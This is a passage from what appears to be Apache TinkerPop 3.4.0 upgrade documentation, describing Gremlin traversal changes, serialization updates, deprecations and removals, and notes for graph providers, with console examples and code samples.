index().unfold()\n==>[lop,0]\n==>[ripple,1]\ngremlin> g.V().hasLabel(\"person\").values(\"name\").fold().\n......1> order(local).by(decr).\n......2> index().\n......3> with(WithOptions.indexer, WithOptions.map)\n==>[0:vadas,1:peter,2:marko,3:josh]\n```\n\n==== Modulation of valueMap()\n\nThe `valueMap()` step now supports `by` and `with` modulation, which also led to the deprecation of `valueMap(true)` overloads.\n\n===== by() Modulation\n\nWith the help of the `by()` modulator `valueMap()` result values can now be adjusted, which is particularly useful to turn multi-\/list-values into single values.\n\n```\ngremlin> g.V().hasLabel(\"person\").valueMap()\n==>[name:[marko],age:[29]]\n==>[name:[vadas],age:[27]]\n==>[name:[josh],age:[32]]\n==>[name:[peter],age:[35]]\ngremlin> g.V().hasLabel(\"person\").valueMap().by(unfold())\n==>[name:marko,age:29]\n==>[name:vadas,age:27]\n==>[name:josh,age:32]\n==>[name:peter,age:35]\n```\n===== with() Modulation\n\nThe `with()` modulator can be used to include certain tokens (`id`, `label`, `key` and\/or `value`).\n\nThe old way (still valid, but deprecated):\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap(true)\n==>[id:10,label:software,name:[gremlin]]\n==>[id:11,label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap(true)\n==>[id:6,key:location,value:san diego,startTime:1997,endTime:2001]\n==>[id:7,key:location,value:santa cruz,startTime:2001,endTime:2004]\n==>[id:8,key:location,value:brussels,startTime:2004,endTime:2005]\n==>[id:9,key:location,value:santa fe,startTime:2005]\n```\n\nThe new way:\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap().with(WithOptions.tokens)\n==>[id:10,label:software,name:[gremlin]]\n==>[id:11,label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap().with(WithOptions.tokens)\n==>[id:6,key:location,value:san diego,startTime:1997,endTime:2001]\n==>[id:7,key:location,value:santa 
cruz,startTime:2001,endTime:2004]\n==>[id:8,key:location,value:brussels,startTime:2004,endTime:2005]\n==>[id:9,key:location,value:santa fe,startTime:2005]\n```\n\nFurthermore, now there's a finer control over which of the tokens should be included:\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap().with(WithOptions.tokens, WithOptions.labels)\n==>[label:software,name:[gremlin]]\n==>[label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap().with(WithOptions.tokens, WithOptions.values)\n==>[value:san diego,startTime:1997,endTime:2001]\n==>[value:santa cruz,startTime:2001,endTime:2004]\n==>[value:brussels,startTime:2004,endTime:2005]\n==>[value:santa fe,startTime:2005]\n```\n\nAs shown above, the support of the `with()` modulator for `valueMap()` makes the `valueMap(boolean)` overload\nsuperfluous, hence this overload is now deprecated. This is a breaking API change, since `valueMap()` will now always\nyield instances of type `Map<Object, Object>`. Prior this change only the `valueMap(boolean)` overload yielded\n`Map<Object, Object>` objects, `valueMap()` without the boolean parameter used to yield instances of type\n`Map<String, Object>`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2059[TINKERPOP-2059]\n\n==== Predicate Number Comparison\n\nIn previous versions `within()` and `without()` performed strict number comparisons; that means these predicates did\nnot only compare number values, but also the type. This was inconsistent with how other predicates (like `eq`, `gt`,\netc.) work. All predicates will now ignore the number type and instead compare numbers only based on their value.\n\nOld behavior:\n\n```\ngremlin> g.V().has(\"age\", eq(32L))\n==>v[4]\ngremlin> g.V().has(\"age\", within(32L, 35L))\ngremlin>\n```\n\nNew behavior:\n\n```\ngremlin> g.V().has(\"age\", eq(32L))\n==>v[4]\ngremlin> g.V().has(\"age\", within(32L, 35L))\n==>v[4]\n==>v[6]\n```\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2058[TINKERPOP-2058]\n\n==== ReferenceElementStrategy\n\nGremlin Server has had some inconsistent behavior in the serialization of the results it returns. Remote traversals\nbased on Gremlin bytecode always detach returned graph elements to \"reference\" (i.e. removes properties and only\ninclude the `id` and `label`), but scripts would detach graph elements and include the properties. For 3.4.0,\nTinkerPop introduces the `ReferenceElementStrategy` which can be configured on a `GraphTraversalSource` to always\ndetach to \"reference\".\n\n[source,text]\n----\ngremlin> graph = TinkerFactory.createModern()\n==>tinkergraph[vertices:6 edges:6]\ngremlin> g = graph.traversal().withStrategies(ReferenceElementStrategy.instance())\n==>graphtraversalsource[tinkergraph[vertices:6 edges:6], standard]\ngremlin> v = g.V().has('person','name','marko').next()\n==>v[1]\ngremlin> v.class\n==>class org.apache.tinkerpop.gremlin.structure.util.reference.ReferenceVertex\ngremlin> v.properties()\ngremlin>\n----\n\nThe packaged initialization scripts that come with Gremlin Server now pre-configure the sample graphs with this\nstrategy to ensure that both scripts and bytecode based requests over any protocol (HTTP, websocket, etc) and\nserialization format all return a \"reference\". 
To revert to the old form, simply remove the strategy in the\ninitialization script.\n\nIt is recommended that users choose to configure their `GraphTraversalSource` instances with `ReferenceElementStrategy`\nas working with \"references\" only is the recommended method for developing applications with TinkerPop. In the future,\nit is possible that `ReferenceElementStrategy` will be configured by default for all graphs on or off Gremlin Server,\nso it would be best to start utilizing it now and grooming existing Gremlin and related application code to account\nfor it.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2075[TINKERPOP-2075]\n\n==== Text Predicates\n\nGremlin now supports simple text predicates on top of the existing `P` predicates. Both, the new `TextP` text\npredicates and the old `P` predicates, can be chained using `and()` and `or()`.\n\n[source,groovy]\n----\ngremlin> g.V().has(\"person\",\"name\", containing(\"o\")).valueMap()\n==>[name:[marko],age:[29]]\n==>[name:[josh],age:[32]]\ngremlin> g.V().has(\"person\",\"name\", containing(\"o\").and(gte(\"j\").and(endingWith(\"ko\")))).valueMap()\n==>[name:[marko],age:[29]]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2041[TINKERPOP-2041]\n\n==== Changed Infix Behavior\n\nThe infix notation of `and()` and `or()` now supports an arbitrary number of traversals and `ConnectiveStrategy`\nproduces a traversal with proper AND and OR semantics.\n\n```\nInput: a.or.b.and.c.or.d.and.e.or.f.and.g.and.h.or.i\n\n*BEFORE*\nOutput: or(a, or(and(b, c), or(and(d, e), or(and(and(f, g), h), i))))\n\n*NOW*\nOutput: or(a, and(b, c), and(d, e), and(f, g, h), i)\n```\n\nFurthermore, previous versions failed to apply 3 or more `and()` steps using the infix notation, this is now fixed.\n\n[source,groovy]\n----\ngremlin> g.V().has(\"name\",\"marko\").and().has(\"age\", lt(30)).or().has(\"name\",\"josh\").and().has(\"age\", gt(30)).and().out(\"created\")\n==>v[1]\n==>v[4]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2029[TINKERPOP-2029]\n\n==== GraphBinary\n\nGraphBinary is a new language agnostic, network serialization format designed to replace Gryo and GraphSON. At this\ntime it is only available on the JVM, but support will be added for other languages in upcoming releases. The\nserializer has been configured in Gremlin Server's packaged configuration files. The serializer can be configured\nusing the Java driver as follows:\n\n[source,java]\n----\nCluster cluster = Cluster.build(\"localhost\").port(8182).\n serializer(Serializers.GRAPHBINARY_V1D0).create();\nClient client = cluster.connect();\nList<Result> r = client.submit(\"g.V().has('person','name','marko')\").all().join();\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1942[TINKERPOP-1942],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/dev\/io\/#graphbinary[IO Documentation]\n\n==== Status Attributes\n\nThe Gremlin Server protocol allows for status attributes to be returned in responses. These attributes were typically\nfor internal use, but were designed with extensibility in mind so that providers could place return their own\nattributes to calling clients. Unfortunately, unless the client was being used with protocol level requests (which\nwasn't convenient) those attributes were essentially hidden from view. 
As of this version however, status attributes\nare fully retrievable for both successful requests and exceptions.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1913[TINKERPOP-1913]\n\n==== with() Step\n\nThis version of TinkerPop introduces the `with()`-step to Gremlin. It isn't really a step but is instead a step\nmodulator. This modulator allows the step it is modifying to accept configurations that can be used to alter the\nbehavior of the step itself. A good example of its usage is shown with the revised syntax of the `pageRank()`-step\nwhich now uses `with()` to replace the old `by()` options:\n\n[source,groovy]\n----\ng.V().hasLabel('person').\n pageRank().\n with(PageRank.edges, __.outE('knows')).\n with(PageRank.propertyName, 'friendRank').\n order().\n by('friendRank',desc).\n valueMap('name','friendRank')\n----\n\nA similar change was made for `peerPressure()`-step:\n\n[source,groovy]\n----\ng.V().hasLabel('person').\n peerPressure().\n with(PeerPressure.propertyName, 'cluster').\n group().\n by('cluster').\n by('name')\n----\n\nNote that the `by()` modulators still work, but should be considered deprecated and open for removal in a future\nrelease where breaking changes are allowed.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1975[TINKERPOP-1975],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#with-step[Reference Documentation]\n\n==== shortestPath() Step\n\nCalculating the link:https:\/\/en.wikipedia.org\/wiki\/Shortest_path_problem[shortest path] between vertices is a common\ngraph use case. While the traversal to determine a shortest path can be expressed in Gremlin, this particular problem\nis common enough that the feature has been encapsulated into its own step, demonstrated as follows:\n\n[source,text]\n----\ngremlin> g.withComputer().V().has('name','marko').\n......1> shortestPath().with(ShortestPath.target, has('name','peter'))\n==>[v[1],v[3],v[6]]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1990[TINKERPOP-1990],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#shortestpath-step[Reference Documentation]\n\n==== connectedComponent() Step\n\nIn prior version of TinkerPop, it was recommended that the identification of\nlink:https:\/\/en.wikipedia.org\/wiki\/Connected_component_(graph_theory)[Connected Component] instances in a graph be\ncomputed by way of a reasonably complex bit of Gremlin that looked something like this:\n\n[source,groovy]\n----\ng.V().emit(cyclicPath().or().not(both())).repeat(both()).until(cyclicPath()).\n path().aggregate(\"p\").\n unfold().dedup().\n map(__.as(\"v\").select(\"p\").unfold().\n filter(unfold().where(eq(\"v\"))).\n unfold().dedup().order().by(id).fold()).\n dedup()\n----\n\nThe above approach had a number of drawbacks that included a large execution cost as well as incompatibilities in OLAP.\nTo simplify usage of this commonly use graph algorithm, TinkerPop 3.4.0 introduces the `connectedComponent()` step\nwhich reduces the above operation to:\n\n[source,groovy]\n----\ng.withComputer().V().connectedComponent()\n----\n\nIt is important to note that this step does require the use of a `GraphComputer` to work, as it utilizes a\n`VertexProgram` behind the scenes.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1967[TINKERPOP-1967],\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#connectedcomponent-step[Reference Documentation]\n\n==== io() Step\n\nThere have been some important changes to IO operations for 
reading and writing graph data. The use of `Graph.io()`\nhas been deprecated to further remove dependence on the Graph (Structure) API for users and to extend these basic\noperations to GLV users by making these features available as part of the Gremlin language.\n\nIt is now possible to simply use Gremlin:\n\n[source,groovy]\n----\ngraph = ...\ng = graph.traversal()\ng.io(someInputFile).read().iterate()\ng.io(someOutputFile).write().iterate()\n----\n\nWhile `io()`-step is still single-threaded for OLTP style loading, it can be utilized in conjunction with OLAP which\ninternally uses `CloneVertexProgram` and therefore any graph `InputFormat` or `OutputFormat` can be configured in\nconjunction with this step for parallel loads of large datasets.\n\nIt is also worth noting that the `io()`-step may be overridden by graph providers to utilize their native bulk-loading\nfeatures, so consult the documentation of the implementation being used to determine if there are any improved\nefficiencies there.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1996[TINKERPOP-1996],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#io-step[Reference Documentation]\n\n==== Per Request Options\n\nThe Java driver now allows for various options to be set on a per-request basis via new overloads to `submit()` that\naccept `RequestOption` instances. A good use-case for this feature is to set a per-request override to the\n`scriptEvaluationTimeout` so that it only applies to the current request.\n\n[source,java]\n----\nCluster cluster = Cluster.open();\nClient client = cluster.connect();\nRequestOptions options = RequestOptions.build().timeout(500).create();\nList<Result> result = client.submit(\"g.V()\", options).all().get();\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1342[TINKERPOP-1342]\n\n==== min() max() and Comparable\n\nPreviously `min()` and `max()` were only working for numeric values. This has been changed and these steps can now\noperate over any `Comparable` value. The common workaround was the combination of `order().by()` and `limit()` as\nshown here:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').order().by().limit(1) \/\/ workaround for min()\n==>josh\ngremlin> g.V().values('name').order().by(decr).limit(1) \/\/ workaround for max()\n==>vadas\n----\n\nAny attempt to use `min()` or `max()` on non-numeric values lead to an exception:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').min()\njava.lang.String cannot be cast to java.lang.Number\nType ':help' or ':h' for help.\nDisplay stack trace? 
[yN]\n----\n\nWith the changes in this release these kind of queries became a lot easier:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').min()\n==>josh\ngremlin> g.V().values('name').max()\n==>vadas\n----\n\n==== Nested Loop Support\n\nTraversals now support nesting of `repeat()` loops.\n\nThese can now be used to repeat another traversal while in a looped context, either inside the body of a `repeat()` or\nin its step modifiers (`until()` or `emit()`).\n\n[source,groovy]\n----\ngremlin> g.V().repeat(__.in('traverses').repeat(__.in('develops')).emit()).emit().values('name')\n==>stephen\n==>matthias\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-967[TINKERPOP-967]\n\n==== EventStrategy API\n\nThere were some minor modifications to how `EventStrategy` is constructed and what can be expected from events raised\nfrom the addition of new properties.\n\nWith respect to the change in terms of `EventStrategy` construction, the `detach()` builder method formerly took a\n`Class` as an argument and that `Class` was meant to be one of the various \"detachment factories\" or `null`. That\napproach was a bit confusing, so that signature has changed to `detach(EventStrategy.Detachment)` where the argument\nis a more handy enum of detachment options.\n\nAs for the changes related to events themselves, it is first worth noting that the previously deprecated\n`vertexPropertyChanged(Vertex, Property, Object, Object...)` on `MutationListener` has been removed for what should\nhave originally been the correct signature of `vertexPropertyChanged(Vertex, VertexProperty, Object, Object...)`. In\nprior versions when this method and its related `edgePropertyChanged()` and `vertexPropertyPropertyChanged()` were\ntriggered by way of the addition of a new property a \"fake\" property was included with a `null` value for the\n\"oldValue\" argument to these methods (as it did not exist prior to this event). That was a bit awkward to reason about\nwhen dealing with that event. To make this easier, the event now raises with a `KeyedVertexProperty` or\n`KeyedProperty` instance, which only contains a property key and no value in them.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1831[TINKERPOP-1831]\n\n==== Reducing Barrier Steps\n\nThe behavior of `min()`, `max()`, `mean()` and `sum()` has been modified to return no result if there's no input.\nPreviously these steps yielded the internal seed value:\n\n[source,groovy]\n----\ngremlin> g.V().values('foo').min()\n==>NaN\ngremlin> g.V().values('foo').max()\n==>NaN\ngremlin> g.V().values('foo').mean()\n==>NaN\ngremlin> g.V().values('foo').sum()\n==>0\n----\n\nThese traversals will no longer emit a result. Note, that this also affects more complex scenarios, e.g. if these\nsteps are used in `by()` modulators:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[software:0,person:3.5]\n----\n\nSince software vertices have no outgoing edges and thus no weight values to sum, `software` will no longer show up in\nthe result. 
In order to get the same result as before, one would have to add a `coalesce()`-step:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[person:3.5]\ngremlin> g.V().group().\n......1> by(label).\n......2> by(coalesce(outE().values(\"weight\"), constant(0)).sum())\n==>[software:0,person:3.5]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1777[TINKERPOP-1777]\n\n==== Order of select() Scopes\n\nThe order of select scopes has been changed to: maps, side-effects, paths. Previously the order was: side-effects,\nmaps, paths - which made it almost impossible to select a specific map entry if a side-effect with the same name\nexisted.\n\nThe following snippets illustrate the changed behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>[a:marko]\n----\n\nAbove is the old behavior; the second `select(\"a\")` has no effect, it selects the side-effect `a` again, although one\nwould expect to get the map entry `a`. What follows is the new behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1522[TINKERPOP-1522]\n\n==== GraphSON BulkSet\n\nIn earlier versions of TinkerPop, `BulkSet` was coerced to a `List` for GraphSON which was convenient in that it\ndidn't add a new data type to support, but inconvenient in that it meant that certain process tests were not consistent\nin terms of how they ran and the benefits of the `BulkSet` were \"lost\" in that the \"bulk\" was being resolved server\nside. With the addition of `BulkSet` as a GraphSON type the \"bulk\" is now resolved on the client side by the language\nvariant. How that resolution occurs depends upon the language variant. For Java, there is a `BulkSet` object which\nmaintains that structure sent from the server. For the other variants, the `BulkSet` is deserialized to a `List` form\nwhich results in a much larger memory footprint than what is contained the `BulkSet`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2111[TINKERPOP-2111]\n\n==== Python Bindings\n\nBindings were formerly created using a Python 2-tuple as a bit of syntactic sugar, but all other language variants\nused an explicit `Bindings` object which `gremlin-python` already had in place. 
To make all work variants behave\nconsistently, the 2-tuple syntax has been removed in favor of the explicit `Bindings.of()` option.\n\n[source,python]\n----\ng.V(Bindings.of('id',1)).out('created').map(lambda: (\"it.get().value('name').length()\", \"gremlin-groovy\")).sum()\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2116[TINKERPOP-2116]\n\n==== Deprecation and Removal\n\nThis section describes newly deprecated classes, methods, components and patterns of usage as well as which previously\ndeprecated features have been officially removed or repurposed.\n\n===== Moving of RemoteGraph\n\n`RemoteGraph` was long ago deprecated in favor of `withRemote()`. It became even less useful with the introduction of\nthe `AnonymousTraversalSource` concept in 3.3.5. It's only real use was for testing remote bytecode based traversals\nin the test suite as the test suite requires an actual `Graph` object to function properly. As such, `RemoteGraph` has\nbeen moved to `gremlin-test`. It should no longer be used in any capacity besides that.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2079[TINKERPOP-2079]\n\n===== Removal of Giraph Support\n\nSupport for Giraph has been removed as of this version. There were a number of reasons for this decision which were\ndiscussed in the community prior to taking this step. Users should switch to Spark for their OLAP based graph-computing\nneeds.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1930[TINKERPOP-1930]\n\n===== Removal of Rebindings Options\n\nThe \"rebindings\" option is no longer supported for clients. It was deprecated long ago at 3.1.0. The server will not\nrespond to them on any channel - websockets, nio or HTTP. Use the \"aliases\" option instead.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1705[TINKERPOP-1705]\n\n===== gremlin-server.sh -i Removal\n\nThe `-i` option for installing dependencies in Gremlin Server was long ago deprecated and has now been removed. 
Please\nuse `install` as its replacement going forward.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2031[TINKERPOP-2031]\n\n===== Deprecation Removal\n\nThe following deprecated classes, methods or fields have been removed in this version:\n\n* `gremlin-core`\n** `org.apache.tinkerpop.gremlin.jsr223.ImportCustomizer#GREMLIN_CORE`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteGraph` - moved to `gremlin-test`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteConnection.submit(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteConnection.submit(Bytecode)`\n** `org.apache.tinkerpop.gremlin.process.remote.traversal.strategy.decoration.RemoteStrategy#identity()`\n** `org.apache.tinkerpop.gremlin.process.traversal.TraversalEngine`\n** `org.apache.tinkerpop.gremlin.process.traversal.engine.*`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.PartitionStrategy.Builder#addReadPartition(String)`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.SubgraphStrategy.Builder#edgeCriterion(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.SubgraphStrategy.Builder#vertexCriterion(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.map.LambdaCollectingBarrierStep.Consumers`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.util.HasContainer#makeHasContainers(String, P)`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.util.event.MutationListener#vertexPropertyChanged(Vertex, Property, Object, Object...)`\n** `org.apache.tinkerpop.gremlin.structure.Element.Exceptions#elementAlreadyRemoved(Class, Object)`\n** `org.apache.tinkerpop.gremlin.structure.Graph.Exceptions#elementNotFound(Class, Object)`\n** `org.apache.tinkerpop.gremlin.structure.Graph.Exceptions#elementNotFound(Class, Object, Exception)`\n* `gremlin-driver`\n** `org.apache.tinkerpop.gremlin.driver.Client#rebind(String)`\n** `org.apache.tinkerpop.gremlin.driver.Client.ReboundClusterdClient`\n** `org.apache.tinkerpop.gremlin.driver.Tokens#ARGS_REBINDINGS`\n* `gremlin-groovy`\n** `org.apache.tinkerpop.gremlin.groovy.jsr223.GremlinGroovyScriptEngine.close()` - no longer implements `AutoCloseable`\n* `gremlin-server`\n** `org.apache.tinkerpop.gremlin.server.GraphManager#getGraphs()`\n** `org.apache.tinkerpop.gremlin.server.GraphManager#getTraversalSources()`\n** `org.apache.tinkerpop.gremlin.server.Settings#serializedResponseTimeout`\n** `org.apache.tinkerpop.gremlin.server.Settings.AuthenticationSettings#className`\n** `org.apache.tinkerpop.gremlin.server.handler.OpSelectorHandler(Settings, GraphManager, GremlinExecutor, ScheduledExecutorService)`\n** `org.apache.tinkerpop.gremlin.server.op.AbstractOpProcessor#makeFrame(ChannelHandlerContext, RequestMessage, MessageSerializer serializer, boolean, List, ResponseStatusCode code)`\n* `hadoop-graph`\n** `org.apache.tinkerpop.gremlin.hadoop.structure.HadoopConfiguration#getGraphInputFormat()`\n** `org.apache.tinkerpop.gremlin.hadoop.structure.HadoopConfiguration#getGraphOutputFormat()`\n\nPlease see the javadoc deprecation notes or upgrade documentation specific to when the deprecation took place to\nunderstand how to resolve this breaking change.\n\nSee: 
link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1143[TINKERPOP-1143],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1296[TINKERPOP-1296],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1705[TINKERPOP-1705],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1707[TINKERPOP-1707],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1954[TINKERPOP-1954],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1986[TINKERPOP-1986],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2079[TINKERPOP-2079],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2103[TINKERPOP-2103]\n\n===== Deprecated GraphSONMessageSerializerGremlinV2d0\n\nThe `GraphSONMessageSerializerGremlinV2d0` serializer is now analogous to `GraphSONMessageSerializerV2d0` and therefore\nredundant. It has technically always been equivalent in terms of functionality as both serialized to the same format\n(i.e. GraphSON 2.0 with embedded types). It is no longer clear why these two classes were established this way, but\nit does carry the negative effect where multiple serializer versions could not be bound to Gremlin Server's HTTP\nendpoint as the MIME types conflicted on `application\/json`. By simply making both message serializers support\n`application\/json` and `application\/vnd.gremlin-v2.0+json`, it then became possible to overcome that limitation. In\nshort, prefer use of `GraphSONMessageSerializerV2d0` when possible.\n\nNote that this is a breaking change in the sense that `GraphSONMessageSerializerV2d0` will no longer set the header of\nrequests messages to `application\/json`. As a result, older versions of Gremlin Server not configured with\n`GraphSONMessageSerializerGremlinV2d0` will not find a deserializer to match the request.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1984[TINKERPOP-1984]\n\n===== Removed groovy-sql Dependency\n\nGremlin Console and Gremlin Server no longer include groovy-sql. If you depend on groovy-sql,\nyou can install it in Gremlin Console or Gremlin Server using the plugin system.\n\nConsole:\n```\n:install org.codehaus.groovy groovy-sql 2.5.2\n```\n\nServer:\n```\nbin\/gremlin-server.sh install org.codehaus.groovy groovy-sql 2.5.2\n```\n\nIf your project depended on groovy-sql transitively, simply include it in your project's build file (e.g. maven: pom.xml).\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2037[TINKERPOP-2037]\n\n=== Upgrading for Providers\n\n==== Graph Database Providers\n\n===== io() Step\n\nThe new `io()`-step that was introduced provides some new changes to consider. Note that `Graph.io()` has been\ndeprecated and users are no longer instructed to utilize that method. It is not yet decided when that method will be\nremoved completely, but given the public nature of it and the high chance of common usage, it should be hanging around\nfor some time.\n\nAs with any step in Gremlin, it is possible to replace it with a more provider specific implementation that could be\nmore efficient. Developing a `TraversalStrategy` to do this is encouraged, especially for those graph providers who\nmight have special bulk loaders that could be abstracted by this step. Examples of this are already shown with\n`HadoopGraph` which replaces the simple single-threaded loader with `CloneVertexProgram`. Graph providers are\nencouraged to use the `with()` step to capture any necessary configurations required for their underlying loader to\nwork. 
Graph providers should not feel restricted to `graphson`, `gryo` and `graphml` formats either. If a graph\nsupports CSV or some custom graph specific format, it shouldn't be difficult to gather the configurations necessary to\nmake that available to users.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1996[TINKERPOP-1996]\n\n===== Caching Graph Features\n\nFor graph implementations that have expensive creation times, it can be time consuming to run the TinkerPop test suite\nas each test run requires a `Graph` instance even if the test is ultimately ignored becaue it doesn't pass the feature\nchecks. To possibly help alleviate this problem, the `GraphProvider` interface now includes this method:\n\n[source,java]\n----\npublic default Optional<Graph.Features> getStaticFeatures() {\n return Optional.empty();\n}\n----\n\nThis method can be implemented to return a cacheable set of features for a `Graph` generated from that `GraphProvider`.\nAssuming this method is faster than the cost of creating a new `Graph` instance, the test suite should execute\nsignificantly faster depending on how many tests end up being ignored.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1518[TINKERPOP-1518]\n\n===== Configuring Interface\n\nThere were some changes to interfaces that were related to `Step`. A new `Configuring` interface was added that was\nhelpful in the implementation of the `with()`-step modulator. This new interface extends the `Parameterizing` interface\n(which moved to the `org.apache.tinkerpop.gremlin.process.traversal.step` package with the other step interfaces) and\nin turn is extended by the `Mutating` interface. Making this change meant that the `Mutating.addPropertyMutations()`\nmethod could be removed in favor of the new `Configuring.configure()` method.\n\nAll of the changes above basically mean, that if the `Mutating` interface was being used in prior versions, the\n`addPropertyMutations()` method simply needs to be changed to `configure()`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1975[TINKERPOP-1975]\n\n===== OptionsStrategy\n\n`OptionsStrategy` is a `TraversalStrategy` that makes it possible for users to set arbitrary configurations on a\n`Traversal`. These configurations can be used by graph providers to allow for traversal-level configurations to be\naccessible to their custom steps. 
A user would write something like:\n\n[source,java]\n----\ng.withStrategies(OptionsStrategy.build().with(\"specialLimit\", 10000).create()).V();\n----\n\nThe `OptionsStrategy` is really only the carrier for the configurations, and while users can construct it with the\nmore verbose method shown above, it is more elegantly constructed as follows using the `with()`-step:\n\n[source,java]\n----\ng.with(\"specialLimit\", 10000).V();\n----\n\nThe graph provider could then access the value of \"specialLimit\" in their custom step (or elsewhere) as follows:\n\n[source,java]\n----\nOptionsStrategy strategy = this.getTraversal().asAdmin().getStrategies().getStrategy(OptionsStrategy.class).get();\nint specialLimit = (int) strategy.getOptions().get(\"specialLimit\");\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2053[TINKERPOP-2053]\n\n===== Removed hadoop-gremlin Test Artifact\n\nThe `hadoop-gremlin` module no longer generates a test jar that can be used as a test dependency in other modules.\nGenerally speaking, that approach tends to be a bad practice and can cause build problems with Maven that aren't always\nobvious to troubleshoot. With the removal of `giraph-gremlin` for 3.4.0, it seemed even less useful to have this\ntest artifact present. All tests are still present. The following provides a basic summary of how this refactoring\noccurred:\n\n* A new `AbstractFileGraphProvider` was created in `gremlin-test`, which provides a lot of the features that\n`HadoopGraphProvider` was exposing. Both `HadoopGraphProvider` and `SparkHadoopGraphProvider` extend from that class\nnow.\n* `ToyIoRegistry` and related classes were moved to `gremlin-test`.\n* The various tests that validated capabilities of `Storage` have been moved to `spark-gremlin` and are part of those\ntests now. Obviously, that makes those tests specific to Spark testing now. If that location creates a problem for some\nreason, that decision can be revisited at some point.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1410[TINKERPOP-1410]\n\n===== TraversalEngine Moved\n\nThe `TraversalEngine` interface was deprecated in 3.2.0 along with all related methods that used it and classes that\nimplemented it. It was replaced by the `Computer` interface, which provides a much nicer way to plug different\nimplementations of `Computer` into a traversal. `TraversalEngine` was never wholly removed, however, as it had some deep\ndependencies in the inner workings of the test suite. That infrastructure has largely remained as is until now.\n\nAs of 3.4.0, 